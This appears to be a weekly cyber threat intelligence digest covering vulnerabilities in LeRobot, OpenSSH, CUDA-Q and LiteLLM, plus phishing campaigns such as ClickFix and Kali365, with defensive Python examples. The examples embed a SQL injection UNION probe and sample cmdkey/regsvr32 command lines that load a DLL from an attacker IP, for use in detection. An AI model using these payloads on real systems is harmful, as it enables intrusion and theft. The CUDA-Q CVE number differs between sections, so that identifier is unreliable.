Cyber Threat Intelligence Digest: Week 17

29th April 2026 - Threat Reports
  • Vulnerabilities
  • Potential Threats
  • General News
  • Threat Actor Weekly Graph
  • Global Trends Powered by Recorded Future
  • Prominent Information Security Events
  • Remediation Actions

Executive Summary - Highlights of Cyber Threat Intelligence Digest

Vulnerabilities

Researchers Disclose Critical CVE-2026-25874 in Hugging Face LeRobot Enabling Unauthenticated Remote Code Execution - On 27 April 2026, Resecurity disclosed a critical vulnerability, CVE-2026-25874, in Hugging Face LeRobot, an open-source robotics framework for machine learning. The flaw sits in the async inference PolicyServer, which normally runs on a remote GPU machine and exchanges data with a robot client over gRPC. The server accepts Python pickle data and unpacks it with pickle.loads() before checking what it actually contains. Since the relevant gRPC endpoints require neither authentication nor TLS, anyone who can reach the service can send a malicious pickle payload and run their own code on the server or client. No exploitation in the wild has been reported so far.

Researchers demonstrated the issue using LeRobot v0.4.3 from PyPI, connecting to the PolicyServer over an insecure gRPC channel. They built a pickle object whose __reduce__() method runs os.system() the moment it is unpacked, then placed it in the data fields of SendPolicyInstructions() and SendObservations(). The server unpacked the bytes before validating them, so the commands executed even though the call later failed. Their tests copied /etc/passwd to /tmp/x and wrote the output of id to /tmp/lerobot_pwned, confirming full command execution on the host.
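As an added illustration (not code from Resecurity or the LeRobot project), the unsafe deserialisation pattern sits next to two defensive alternatives: a restricted unpickler that refuses global lookups, and the JSON-with-schema replacement recommended in the remediation section, with an opcode scan that flags pickles referencing callables without loading them. The observation field names are assumed for illustration and are not LeRobot's real message layout.

```python
import io
import json
import pickle
import pickletools

# Vulnerable pattern, as described for the LeRobot PolicyServer: the bytes are
# unpickled before any validation, so GLOBAL/REDUCE opcodes in the stream run
# attacker-chosen callables during unpacking, not after it.
def unsafe_decode(blob: bytes):
    return pickle.loads(blob)

# Defence in depth: an unpickler that refuses every global lookup, so only
# primitive containers (dict, list, str, int, float) can be loaded.
class RestrictedUnpickler(pickle.Unpickler):
    def find_class(self, module, name):
        raise pickle.UnpicklingError(f"global {module}.{name} is not allowed")

def safe_unpickle(blob: bytes):
    return RestrictedUnpickler(io.BytesIO(blob)).load()

# Preferred fix: a data-only wire format with an explicit schema, so decoding
# can never execute code. Field names are assumed, not LeRobot's real layout.
OBSERVATION_SCHEMA = {"state": list, "timestep": int}

def decode_observation(blob: bytes) -> dict:
    obj = json.loads(blob.decode("utf-8"))
    if not isinstance(obj, dict) or set(obj) != set(OBSERVATION_SCHEMA):
        raise ValueError("unexpected observation fields")
    for key, typ in OBSERVATION_SCHEMA.items():
        if not isinstance(obj[key], typ):
            raise ValueError(f"{key} must be {typ.__name__}")
    return obj

# Detection: walk the opcode stream without executing it. Any GLOBAL or
# STACK_GLOBAL opcode means the payload names a callable to be resolved.
def contains_global(blob: bytes) -> bool:
    return any(op.name in ("GLOBAL", "STACK_GLOBAL")
               for op, _arg, _pos in pickletools.genops(blob))

# Constructed samples: a benign data pickle, a pickle that references a
# harmless builtin by name (the opcode a hostile payload also relies on),
# and the equivalent JSON observation.
BENIGN_PICKLE = pickle.dumps({"state": [0.1, 0.2], "timestep": 3})
GLOBAL_REF_PICKLE = pickle.dumps(len)
OBSERVATION_JSON = json.dumps({"state": [0.1, 0.2], "timestep": 3}).encode()

if __name__ == "__main__":
    print("benign pickle references a global:", contains_global(BENIGN_PICKLE))
    print("reference pickle references a global:", contains_global(GLOBAL_REF_PICKLE))
    print("decoded JSON observation:", decode_observation(OBSERVATION_JSON))
```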

OpenSSH Patches CVE-2026-35414 Vulnerability - On 27 April 2026, Cyera disclosed an 8.1-severity OpenSSH vulnerability, CVE-2026-35414, to SecurityWeek. The flaw affects OpenSSH versions released over roughly the past 15 years and was fixed in version 10.3 in early April 2026. Organisations using SSH certificate-based authentication should review their certificate authority principal settings and track down any vulnerable OpenSSH deployments. No active exploitation has been seen so far.

CVE-2026-35414 is an access control bypass tied to the "authorized_keys" principals option in setups that use SSH certificate authorities. Because of reused code, a comma inside a certificate principal, such as "deploy,root", can be read as a list separator during authorisation checks. A user holding a valid certificate from a trusted CA could abuse this to log in as "root" on a vulnerable server. Since OpenSSH treats the login as legitimate, it may not produce authentication-failure logs, making log-based detection unreliable.
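An added audit helper (not from OpenSSH or Cyera) that parses the output of ssh-keygen -L for certificate principals containing a comma and checks an ssh -V banner against the fixed 10.3 release; the certificate listing is a constructed sample whose layout follows ssh-keygen's text format, with every value made up.

```python
import re

# Constructed sample of `ssh-keygen -L -f user-cert.pub` output. The layout
# follows ssh-keygen's text listing; every value is made up for illustration.
SSH_KEYGEN_L_OUTPUT = """\
user-cert.pub:
        Type: ssh-ed25519-cert-v01@openssh.com user certificate
        Public key: ED25519-CERT SHA256:EXAMPLEUSERKEYFINGERPRINTxxxxxxxxxxxxxxxxxx
        Signing CA: ED25519 SHA256:EXAMPLECAFINGERPRINTxxxxxxxxxxxxxxxxxxxxxxx (using ssh-ed25519)
        Key ID: "deploy-pipeline"
        Serial: 42
        Valid: from 2026-04-01T00:00:00 to 2026-05-01T00:00:00
        Principals: 
                deploy,root
                deploy
        Critical Options: (none)
        Extensions: 
                permit-pty
"""

# Field labels are capitalised words ending in a colon ("Critical Options:").
FIELD_RE = re.compile(r"^[A-Z][A-Za-z ]+:")

def parse_principals(listing: str) -> list:
    """Collect the lines listed under 'Principals:' up to the next field label."""
    principals, in_block = [], False
    for line in listing.splitlines():
        stripped = line.strip()
        if stripped.startswith("Principals:"):
            in_block = True
            continue
        if in_block:
            if FIELD_RE.match(stripped):
                break
            if stripped:
                principals.append(stripped)
    return principals

def comma_principals(principals: list) -> list:
    """Principals embedding a comma, the shape behind CVE-2026-35414."""
    return [p for p in principals if "," in p]

def version_is_patched(banner: str) -> bool:
    """True if an `ssh -V` banner reports OpenSSH 10.3 or later."""
    m = re.search(r"OpenSSH_(\d+)\.(\d+)", banner)
    if not m:
        raise ValueError("not an OpenSSH version banner")
    return (int(m.group(1)), int(m.group(2))) >= (10, 3)

if __name__ == "__main__":
    found = parse_principals(SSH_KEYGEN_L_OUTPUT)
    print("principals:", found)
    print("principals with a comma:", comma_principals(found))
    print("10.3p1 patched:", version_is_patched("OpenSSH_10.3p1, OpenSSL 3.0.13 30 Jan 2024"))
```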

NVIDIA Patches Out-of-Bounds Vulnerability CVE-2026-24189 Affecting NVIDIA CUDA-Q - On 21 April 2026, NVIDIA patched an out-of-bounds vulnerability, CVE-2026-24189, affecting all versions of NVIDIA CUDA-Q before 0.14.0. An unauthenticated attacker could trigger an out-of-bounds read by sending a specially crafted request.

A successful exploit may lead to denial-of-service or information disclosure. No exploitation in the wild has been reported. Insikt Group recommends updating NVIDIA CUDA-Q to version 0.14.0 to mitigate the risk.

Potential Threats

Threat Actors Actively Exploit SQL Injection Vulnerability CVE-2026-42208 Affecting LiteLLM - On 27 April 2026, Sysdig reported active exploitation of CVE-2026-42208, a critical SQL injection flaw in LiteLLM versions 1.81.16 through 1.83.6. The bug comes from the Authorization: Bearer header being plugged straight into a database query during proxy API key checks, with no parameter binding. An unauthenticated attacker can read and possibly alter sensitive data in the proxy database, exposing credentials and opening the door to wider access. Sysdig first saw exploitation on 26 April 2026, roughly 36 hours after LiteLLM maintainers disclosed the issue on GitHub.

According to Sysdig, the attacker used crafted Authorization: Bearer headers with UNION-based payloads to map out the database, focusing on three high-value tables: LiteLLM_VerificationToken, litellm_credentials and litellm_config. The activity included column-count discovery and showed prior knowledge of LiteLLM's schema, including the correct Prisma-generated table casing. The attacker then rotated egress IPs, replayed payloads against priority targets and probed the /key/generate and /key/info endpoints without authentication. Sysdig has not attributed the activity to a specific actor and has not seen follow-on use of stolen or virtual keys. Organisations are advised to update LiteLLM to version 1.83.7 or later.
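To make the root cause concrete, an added example (not LiteLLM's code; the table name and key format are stand-ins) shows the interpolated key lookup beside a parameter-bound one, plus a simple check for SQL syntax in bearer values that can be run over proxy access logs.

```python
import re
import sqlite3

# Constructed stand-in for the proxy's key table. LiteLLM's real schema is
# Prisma-managed and is not reproduced here.
def build_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE verification_token (token TEXT PRIMARY KEY, team_id TEXT)")
    conn.execute("INSERT INTO verification_token VALUES ('sk-valid-key', 'team-a')")
    return conn

DB = build_db()

def bearer_value(auth_header: str) -> str:
    """Extract the credential from 'Bearer <value>'."""
    scheme, _, value = auth_header.partition(" ")
    if scheme.lower() != "bearer" or not value:
        raise ValueError("missing bearer token")
    return value

# Vulnerable pattern described in the advisory: the header value is spliced
# into the SQL text, so the database parses it as SQL rather than as data.
def lookup_key_vulnerable(conn, auth_header: str):
    token = bearer_value(auth_header)
    sql = f"SELECT token, team_id FROM verification_token WHERE token = '{token}'"
    return conn.execute(sql).fetchone()

# Hardened form: the token travels as a bound parameter, and a format check
# rejects anything that does not look like an API key before the query runs.
KEY_RE = re.compile(r"^sk-[A-Za-z0-9_-]{4,64}$")

def lookup_key_safe(conn, auth_header: str):
    token = bearer_value(auth_header)
    if not KEY_RE.fullmatch(token):
        return None
    return conn.execute(
        "SELECT token, team_id FROM verification_token WHERE token = ?", (token,)
    ).fetchone()

# Log-side check: a bearer value carrying a quote, a comment marker or a UNION
# keyword is never a valid key and is worth alerting on in proxy access logs.
def is_suspicious_bearer(auth_header: str) -> bool:
    value = bearer_value(auth_header)
    return "'" in value or "--" in value or " UNION " in f" {value.upper()} "

# Constructed header values: a legitimate key and a UNION-style probe of the
# kind Sysdig observed against the proxy.
GOOD_HEADER = "Bearer sk-valid-key"
PROBE_HEADER = "Bearer x' UNION SELECT token, team_id FROM verification_token--"

if __name__ == "__main__":
    print("vulnerable lookup, probe header:", lookup_key_vulnerable(DB, PROBE_HEADER))
    print("safe lookup, probe header:", lookup_key_safe(DB, PROBE_HEADER))
    print("probe flagged:", is_suspicious_bearer(PROBE_HEADER))
```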

New ClickFix Variant Abuses cmdkey and Regsvr32 for Multi-Action Remote DLL Execution and Persistence - On April 22, 2026, CyberProof published analysis of a new ClickFix variant that uses native Windows utilities for a stealthy, fileless intrusion, abusing cmdkey and regsvr32 to stage credentials and execute remote payloads without dropping malware to disk. The infection starts with a phishing page disguised as a CAPTCHA that instructs the victim to run a command via the Windows Run dialog. That command launches cmd.exe, uses cmdkey to store credentials for an attacker-controlled IP (151.245.195.142), then invokes regsvr32 to fetch and execute a remote DLL, demo.dll, from the resulting SMB share. demo.dll then acts as a loader: its DllRegisterServer export uses schtasks to create a scheduled task called RunNotepadNow, pulling its definition from a remote 777.xml on the same share — letting attackers change behaviour without redeploying anything on the host.

Insikt Group obtained the demo.dll sample (SHA256: b2d9a99d…0108), which sandbox analysis flagged as malicious. It requires regsvr32.exe and performs a wide range of actions: creating the RunNotepadNow task, checking for debuggers, connecting to 151.245.195.142 over SMB (TCP 445, NetBIOS 139), enumerating files and processes, creating a mutex (PSReadLineHistoryFile_443796552) to prevent reinfection, deleting itself after execution, and using csc.exe and cvtres.exe to compile code on the host. It also spawns PowerShell via Task Scheduler to pull a script from lowtideaudio.online, and sends GETs to zyp.ssffaa3.xyz and the Telegram channel telegram.me/mm8hyx - both of which currently return errors.

Threat Actors Abuse Microsoft OAuth Device Code Flow via Kali365 Platform to Capture Tokens Across Multiple Regions - On 24 April 2026, Arctic Wolf reported a large-scale phishing campaign abusing Microsoft's OAuth device authorisation (device code) flow, hitting organisations across education, finance, government, healthcare, insurance and manufacturing in North America, Europe, the Middle East and Africa. The campaign runs on the Kali365 Live phishing-as-a-service platform, which lets attackers grab OAuth tokens or authenticated sessions. The infrastructure leans on reverse proxy services on TCP/8443 that terminate TLS using a shared certificate across multiple nodes and forward traffic to active phishing domains. Attackers send emails impersonating services such as SharePoint, OneDrive, Teams, DocuSign and Adobe, with links or attachments leading to fake landing pages that generate valid Microsoft device codes and tell users to sign in at microsoft[.]com/devicelogin. Once the victim enters the code and completes sign-in, including MFA, the Kali365 backend captures the OAuth access and refresh tokens and stores them for later use, with affiliates able to share captured tokens between each other.

Attackers then use the tokens to reach Microsoft 365 services, including mailboxes, via Microsoft Graph. In some cases they create inbox rules that move and mark as read messages containing keywords like "phish", "link" and "SharePoint" to hide warning emails from the user. The platform also offers a separate cookie-based adversary-in-the-middle mode, which routes victim sessions through attacker infrastructure, proxies the Microsoft login page and captures authenticated session cookies for replay. Affiliates spin up multilingual lures, host them through Cloudflare Workers and use a desktop client to view captured tokens and interact with compromised accounts.

General News

Hackers impersonate Microsoft Teams help desk to breach corporate networks - According to a new report from Mandiant, attackers are impersonating Microsoft Teams help desk staff to trick victims into installing data-stealing malware. The campaign, linked to a newly tracked cluster known as UNC6692, mixes email flooding, phishing messages and malicious browser extensions to break into corporate systems. It starts with a flood of emails aimed at overwhelming a target's inbox, after which the attacker contacts the victim on Microsoft Teams from an account outside the organisation, posing as IT support offering to fix the spam. The victim is then told to install a "patch" to stop the disruption. Clicking the link opens a fake "Mailbox Repair Utility" page, which prompts the user to download a script that installs a malicious browser extension called SnowBelt. SnowBelt acts as a backdoor, letting the attackers keep access to corporate accounts and move through internal systems without re-authenticating. Once in place, it can pull down further tools, including malware named SnowGlaze and SnowBasin, AutoHotkey scripts and a portable Python environment for running more malicious code.

The phishing page itself uses several tricks to push victims towards compromise. If the page is opened in anything other than Microsoft Edge, an overlay nags the user to switch browsers, steering them into the environment where the attack works best. The credential-harvesting script also rejects the first two password attempts on purpose, prompting the victim to type their password again, which both reinforces the illusion of a real system and gives the attackers two captures of the same password to reduce errors in the stolen data. Mandiant researchers said the campaign shows an interesting shift in tactics, combining social engineering, custom malware and a malicious browser extension while abusing the trust users place in common enterprise platforms.

Toronto police arrest three in Canada’s first mobile SMS blaster case - Canadian police have arrested three men in the country's first known criminal case involving a mobile "SMS blaster" - a device that impersonates a cellular tower to send mass phishing texts and disrupt mobile networks. Toronto Police began investigating last November after a tip-off about a suspicious device downtown, and tracked it moving across the Greater Toronto Area. Two suspects were arrested in March and a third turned himself in this week; police seized several SMS blasters and other equipment. Tens of thousands of phones are believed to have connected to the rogue system, and authorities recorded more than 13 million network disruptions, which could temporarily cut phones off from legitimate networks and 911 for seconds to several minutes. Deputy Chief Robert Johnson called it a new and emerging threat that can hit thousands of devices at once.

SMS blasters mimic legitimate base stations, tricking nearby phones into connecting so attackers can push texts impersonating banks or government agencies, usually with links to credential-harvesting sites — a tactic known as smishing. Similar attacks have surfaced in Greece, Thailand, Indonesia, Qatar and the UK, often using kit hidden in vehicles. Last year Thai police arrested two suspects hired by a Chinese handler to blast thousands of phishing messages a day from a car, and a Chinese student in London was jailed in June for a similar setup. Canadian police have not named the suspects or said whether victims lost money, and the investigation is ongoing.

Supreme Court signals location data searches should require a warrant - During oral arguments Monday, the Supreme Court signaled that it is likely to rule that police sweeps of cell phones located in an area surrounding a crime scene qualify as a Fourth Amendment protected search, meaning law enforcement would be required to obtain a warrant before conducting them. While police already typically secure warrants to execute so-called geofence searches, the government argued in Chatrie v. United States that such probes do not trigger Fourth Amendment protections at all. Privacy advocates had worried that a ruling in the government's favor would open the door to much broader use of warrantless reverse searches of all types, including controversial keyword searches in which police ask Google to identify everyone who searched for a particular term. Such a decision could have dramatically expanded the surveillance tools available to investigators without judicial oversight.

By the end of Monday's hearing, however, it seemed clear that a majority of justices were prepared to rule that location data searches require a warrant, a significant win for digital privacy advocates. Several justices appeared to go further, indicating that they see a need to craft an opinion that lays out specific requirements ensuring location data searches are as narrow as possible in scope. That suggests the Court may not only affirm Fourth Amendment protections in this context but also impose meaningful limits on how broadly any individual geofence warrant can sweep, potentially shaping the framework for digital-age surveillance for years to come.

Threat Actor Weekly Graph

Over the past 7 days, we have been tracking the following intent and opportunity changes within our Threat Actor Landscape.

Intent represents the potential targets of a group. When a group is observed attacking a different organisation or entity, their intent will increase.

Opportunity represents the various methods and technologies these groups may use. For example, if a group started using a new attack vector, such as a new kind of ransomware, their opportunity would increase.

Both intent and opportunity are scored out of 100 and are responsible for scoring the group's severity. These updates can be seen below.

Severity scale: Limited, Basic, Moderate, High

Threat Actor              Severity (prior > now)   Opportunity (prior > now)   Intent (prior > now)
RedGolf                   High > High              83 > 82 ●                   25 > 25
BlueCharlie               NEW > Moderate           NEW > 55                    NEW > 25
ShinyHunters              Moderate > Moderate      49 > 49                     55 > 58
Storm-1175                NEW > Basic              NEW > 49                    NEW > 25
Krybit Ransomware Group   NEW > Basic              NEW > 25                    NEW > ● 45

Global Trends Powered by Recorded Future

Within each category, we have provided the current top five globally trending items. Each item is linked to how actively trending it is and is marked with a small symbol.

The spikes in references are calculated over 60 days and are normalised to ensure they aren't disproportionate when compared to bigger entities that will naturally have more baseline mentions.

- Spike – This indicates a large increase in reporting volume and a high diversity in the event descriptions.
- Rise – This indicates a small increase in reporting volume with little diversity in the descriptions.

Attackers          Methods                   Vulnerabilities   Targets
Sanjay Soni        Dragon Force Ransomware   CVE-2026-32202    U.S. Department of Defense
Lapsus$ Group      Clop Ransomware           CVE-2026-5281     Cryptocurrency Exchanges
APT38              WebShell                  CVE-2026-6443     IAC/InterActiveCorp
Russian Hackers    Cobalt Strike             CVE-2026-21510    Vimeo
ShinyHunters       Graphite                  CVE-2026-21513    Polymarket

Prominent Information Security Events

New ClickFix Variant Abuses cmdkey and Regsvr32 for Multi-Action Remote DLL Execution and Persistence

Source: Insikt Group | Validated Intelligence Event

IOC: IP - 151[.]245[.]195[.]142

IOC: Hash - b2d9a99de44a7cd8faf396d0482268369d14a315edaf18a36fa273ffd5500108

On April 22, 2026, cybersecurity firm CyberProof published a technical analysis of a new ClickFix variant that uses multi-action command chaining and native Windows utilities to carry out a stealthy, fileless intrusion. The variant abuses trusted binaries — specifically cmdkey and regsvr32 — to stage credentials and execute remote payloads without dropping malware to disk, combining credential access, payload retrieval and execution into a single user-initiated command that blends in with legitimate system behaviour.

The infection begins with a phishing page disguised as a CAPTCHA challenge that instructs the victim to run a malicious command via the Windows Run dialog. The command launches cmd.exe, then uses cmdkey to store credentials for an attacker-controlled IP (151.245.195.142), enabling authenticated access to a remote SMB share. It then invokes regsvr32 to fetch and execute a remote DLL, demo.dll, directly from that share. Once running, demo.dll acts as a loader: its DllRegisterServer export spawns a hidden process that uses schtasks to create a scheduled task called RunNotepadNow, pulling the task definition from a remote XML file (777.xml) on the same share. Externalising the task config lets the attackers change behaviour at any time without redeploying anything on the host, and the chain — credential staging, remote DLL execution and scheduled-task persistence via legitimate Windows tools — leaves minimal artefacts.

Insikt Group obtained the demo.dll sample (SHA256: b2d9a99d…0108) from CyberProof, and sandbox analysis flagged it as malicious. The sample requires regsvr32.exe to run and performs a wide range of actions: creating the RunNotepadNow scheduled task from 777.xml, checking for debuggers via IsDebuggerPresent, connecting to 151.245.195.142 over SMB (TCP 445, NetBIOS 139), enumerating files and processes, retrieving system info, creating a mutex (PSReadLineHistoryFile_443796552) to prevent reinfection, deleting itself after execution, and using csc.exe and cvtres.exe with temporary files (e.g. jqzydbps.cmdline, RES93BF.tmp) to compile code on the host. It also spawns PowerShell via Task Scheduler to download and run a remote script from lowtideaudio.online, sends HTTP GET requests to zyp.ssffaa3.xyz and the Telegram channel telegram.me/mm8hyx, and cleans up its temporary files. At the time of writing, both the lowtideaudio.online and zyp.ssffaa3.xyz endpoints return errors.
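An added detection example (not CyberProof's or Insikt Group's tooling) that walks constructed process-creation events and flags regsvr32 or schtasks reading from a UNC path, plus the stronger signal of a cmdkey /add target that a sibling regsvr32 then loads from. The event fields and values are constructed, and the credential arguments are placeholders.

```python
import re

# Constructed process-creation events (Sysmon Event ID 1 style fields), not
# telemetry from CyberProof or Insikt Group. They mirror the reported chain:
# cmdkey stages credentials for the attacker IP, regsvr32 loads demo.dll from
# the resulting SMB share, and schtasks imports 777.xml from the same share.
# Credential arguments are placeholders. A benign regsvr32 run is included.
SAMPLE_EVENTS = [
    {"pid": 100, "ppid": 7,   "image": r"C:\Windows\explorer.exe",
     "cmd": "explorer.exe"},
    {"pid": 101, "ppid": 100, "image": r"C:\Windows\System32\cmd.exe",
     "cmd": "cmd.exe /c <pasted ClickFix command>"},
    {"pid": 102, "ppid": 101, "image": r"C:\Windows\System32\cmdkey.exe",
     "cmd": "cmdkey /add:151.245.195.142 /user:<user> /pass:<pass>"},
    {"pid": 103, "ppid": 101, "image": r"C:\Windows\System32\regsvr32.exe",
     "cmd": r"regsvr32 /s /i:<arg> \\151.245.195.142\share\demo.dll"},
    {"pid": 104, "ppid": 103, "image": r"C:\Windows\System32\schtasks.exe",
     "cmd": r"schtasks /create /tn RunNotepadNow /xml \\151.245.195.142\share\777.xml"},
    {"pid": 200, "ppid": 7,   "image": r"C:\Windows\System32\regsvr32.exe",
     "cmd": r"regsvr32 /s C:\Program Files\Vendor\plugin.dll"},
]

UNC_RE = re.compile(r"\\\\(?P<host>[\w.-]+)\\")
CMDKEY_ADD_RE = re.compile(r"/add:(\S+)", re.IGNORECASE)

def image_name(event: dict) -> str:
    return event["image"].rsplit("\\", 1)[-1].lower()

def unc_host(cmd: str):
    """Hostname or IP of the first UNC path in a command line, if any."""
    m = UNC_RE.search(cmd)
    return m.group("host").lower() if m else None

def detect_clickfix_chain(events: list) -> list:
    """Return (signal, pid, host) tuples.

    'remote_load'  : regsvr32 or schtasks reading its input from a UNC path.
    'staged_chain' : the UNC host was first given credentials by a cmdkey /add
                     run under the same parent process, the stronger signal.
    """
    alerts = []
    staged = {}  # cmdkey target host -> parent pid that launched cmdkey
    for ev in sorted(events, key=lambda e: e["pid"]):
        name, cmd = image_name(ev), ev["cmd"]
        if name == "cmdkey.exe":
            m = CMDKEY_ADD_RE.search(cmd)
            if m:
                staged[m.group(1).lower()] = ev["ppid"]
            continue
        host = unc_host(cmd)
        if name in ("regsvr32.exe", "schtasks.exe") and host:
            alerts.append(("remote_load", ev["pid"], host))
            if staged.get(host) == ev["ppid"]:
                alerts.append(("staged_chain", ev["pid"], host))
    return alerts

if __name__ == "__main__":
    for alert in detect_clickfix_chain(SAMPLE_EVENTS):
        print(alert)
```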

Threat Actors Abuse Microsoft OAuth Device Code Flow via Kali365 Platform to Capture Tokens Across Multiple Regions

Source: Insikt Group | Validated Intelligence Event

IOC: IP- 216[.]203[.]20[.]95

IOC: Hash - 883d5d4a73b0ac8cf4f78fe46d8f4e76e21508872836f2b439af2de4a205128e

On 24 April 2026, Arctic Wolf reported a large-scale phishing campaign abusing Microsoft's OAuth device authorisation (device code) flow, hitting organisations across education, finance, government, healthcare, insurance and manufacturing in North America, Europe, the Middle East and Africa. The campaign runs on the Kali365 Live phishing-as-a-service platform, which lets attackers grab OAuth tokens or authenticated sessions, and leans on shared reverse proxy infrastructure on TCP/8443 that terminates TLS using a common certificate across multiple nodes.

Attackers send emails impersonating services such as SharePoint, OneDrive, Teams, DocuSign and Adobe, with links or attachments leading to fake landing pages that generate valid Microsoft device codes and tell users to sign in at microsoft[.]com/devicelogin. Once the victim enters the code and completes sign-in, including MFA, the Kali365 backend captures the OAuth access and refresh tokens, with affiliates able to share captured tokens between each other.

Attackers then use the tokens to reach Microsoft 365 services, including mailboxes, via Microsoft Graph, and in some cases create inbox rules that hide messages containing keywords like "phish", "link" and "SharePoint". The platform also offers a separate cookie-based adversary-in-the-middle mode that proxies the Microsoft login page and captures session cookies for replay. Affiliates host multilingual lures through Cloudflare Workers and use a desktop client to manage captured tokens.
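An added triage helper (not Arctic Wolf's code) that scores Microsoft Graph messageRule objects for the hiding pattern described above: text conditions on terms such as "phish", "link" and "SharePoint" combined with actions that take the message out of sight. The rule objects are constructed samples in Graph's messageRule shape, the folder ids are placeholders, and the keyword list extends the three terms from the report with assumed extras.

```python
# Constructed Microsoft Graph mailbox rules in the messageRule shape returned by
# GET /users/{id}/mailFolders/inbox/messageRules; not data from Arctic Wolf.
# Folder ids are placeholders.
SAMPLE_RULES = [
    {"id": "rule-1", "displayName": ".", "isEnabled": True,
     "conditions": {"bodyOrSubjectContains": ["phish", "link", "SharePoint"]},
     "actions": {"markAsRead": True, "moveToFolder": "<rss-feeds-folder-id>"}},
    {"id": "rule-2", "displayName": "Newsletters", "isEnabled": True,
     "conditions": {"senderContains": ["newsletter@"]},
     "actions": {"moveToFolder": "<newsletters-folder-id>"}},
    {"id": "rule-3", "displayName": "Security", "isEnabled": True,
     "conditions": {"subjectContains": ["Suspicious sign-in"]},
     "actions": {"delete": True}},
]

# Terms attackers filter on to suppress warnings (assumed list, lower-cased).
HIDE_KEYWORDS = ("phish", "link", "sharepoint", "suspicious", "sign-in",
                 "password", "security", "hacked")
# messageRuleActions properties that take a message out of the user's sight.
HIDING_ACTIONS = ("markAsRead", "moveToFolder", "delete", "permanentDelete")
# messageRulePredicates properties that match on text.
TEXT_CONDITIONS = ("subjectContains", "bodyContains", "bodyOrSubjectContains",
                   "senderContains")

def rule_risk(rule: dict) -> dict:
    """Score one rule: keyword conditions combined with a hiding action, and a
    blank or one-character name (a common tell), each add to the score."""
    conds = rule.get("conditions") or {}
    terms = [t.lower() for key in TEXT_CONDITIONS for t in conds.get(key, [])]
    matched = sorted({kw for kw in HIDE_KEYWORDS for t in terms if kw in t})
    actions = rule.get("actions") or {}
    hides = [a for a in HIDING_ACTIONS if actions.get(a)]
    score = 0
    if matched and hides:
        score += 2
    if len(rule.get("displayName", "").strip()) <= 1:
        score += 1
    return {"id": rule.get("id"), "name": rule.get("displayName"),
            "matched": matched, "hides": hides, "score": score}

def suspicious_rules(rules: list, threshold: int = 2) -> list:
    """Enabled rules at or above the threshold, highest score first."""
    scored = [rule_risk(r) for r in rules if r.get("isEnabled", True)]
    return sorted((s for s in scored if s["score"] >= threshold),
                  key=lambda s: -s["score"])

if __name__ == "__main__":
    for hit in suspicious_rules(SAMPLE_RULES):
        print(hit)
```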

Remediation Actions

Following the information provided above, we recommend that the technologies mentioned be fully patched and updated. We also want to highlight and recommend applying the following patches where applicable: 

  • CVE-2026-25874 (Hugging Face LeRobot) – This vulnerability can be mitigated by replacing pickle.loads() with a safe format like JSON, enabling TLS encryption, and requiring API tokens for all gRPC clients.

  • CVE-2026-35414 (OpenSSH) – This vulnerability can be remediated by updating OpenSSH to version 10.3.

  • CVE-2026-34486 (NVIDIA CUDA-Q) – This vulnerability can be remediated by updating NVIDIA CUDA-Q to version 0.14.0.

If you are currently an Acumen Cyber Vulnerability Management customer, we will be proactively performing related searching and hunting activities within your environment.